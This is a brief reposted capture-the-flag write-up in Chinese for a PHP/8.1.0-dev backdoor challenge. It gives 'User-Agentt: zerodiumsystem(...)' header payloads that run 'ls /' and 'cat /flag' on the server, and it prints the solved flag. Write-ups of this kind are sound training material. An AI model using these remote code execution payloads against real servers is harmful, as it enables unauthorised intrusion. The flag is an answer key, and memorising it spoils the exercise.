自学内容网 自学内容网

青少年CTF练习平台 PHP的后门

题目

根据提示,PHP/8.1.0-dev漏洞,修改请求头利用此漏洞

注意 zerodium后面拼接函数发送

User-Agentt:zerodiumsystem("ls /");

 读取flag

User-Agentt: zerodiumsystem("cat /flag");

拿下flag

flag{d514c824035b427da2d1c14edb5ae098}


原文地址:https://blog.csdn.net/2301_77012231/article/details/145329169

免责声明:本站文章内容转载自网络资源,如侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!